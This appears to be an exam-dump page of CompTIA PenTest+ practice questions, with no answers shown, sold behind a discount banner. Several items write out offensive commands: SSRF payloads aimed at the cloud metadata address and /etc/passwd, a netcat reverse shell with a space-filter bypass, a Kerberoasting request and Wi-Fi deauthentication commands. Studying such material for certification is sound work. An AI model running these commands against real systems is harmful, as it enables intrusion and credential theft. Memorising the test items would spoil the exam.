New Year Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 1 out of 9 pages
Viewing questions 1-10 out of questions
Questions # 1:

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Question # 1


Expert Solution
Questions # 2:

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl ?param=http://169.254.169.254/latest/meta-data/


B.

curl '?param=http://127.0.0.1/etc/passwd '


C.

curl '?param=<script>alert(1)<script>/'


D.

curl ?param=http://127.0.0.1/


Expert Solution
Questions # 3:

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC

Nmap scan report for example.com (192.168.1.10)

Host is up (0.001s latency).

Not shown: 9999 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

2222/tcp open ssh

444/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.


B.

The SSH service is blocked by a firewall.


C.

The SSH service requires certificate authentication.


D.

The SSH service is not active.


Expert Solution
Questions # 4:

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

Options:

A.

Packet injection


B.

Bluejacking


C.

Beacon flooding


D.

Signal jamming


Expert Solution
Questions # 5:

During a routine penetration test, the client’s security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization. Which of the following is the penetration tester most likely trying to do?

Options:

A.

Obtain long-term, valid access to the facility


B.

Disrupt the availability of facility access systems


C.

Change access to the facility for valid users


D.

Revoke access to the facility for valid users


Expert Solution
Questions # 6:

A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement. Which of the following is the best command to capture handshakes?

Options:

A.

tcpdump -n -s0 -w -i


B.

airserv-ng -d


C.

aireplay-ng -0 1000 -a


D.

airodump-ng -c 6 --bssid


Expert Solution
Questions # 7:

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

Options:

A.

ChopChop


B.

Replay


C.

Initialization vector


D.

KRACK


Expert Solution
Questions # 8:

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Remove the persistence mechanisms.


B.

Spin down the infrastructure.


C.

Preserve artifacts.


D.

Perform secure data destruction.


Expert Solution
Questions # 9:

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}


B.

%0a


C.

+ *


D.

%20


Expert Solution
Questions # 10:

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday


B.

Download all TGS tickets for offline processing


C.

Perform a pass-the-hash attack using the hash for aholliday


D.

Perform password spraying


Expert Solution
Viewing page 1 out of 9 pages
Viewing questions 1-10 out of questions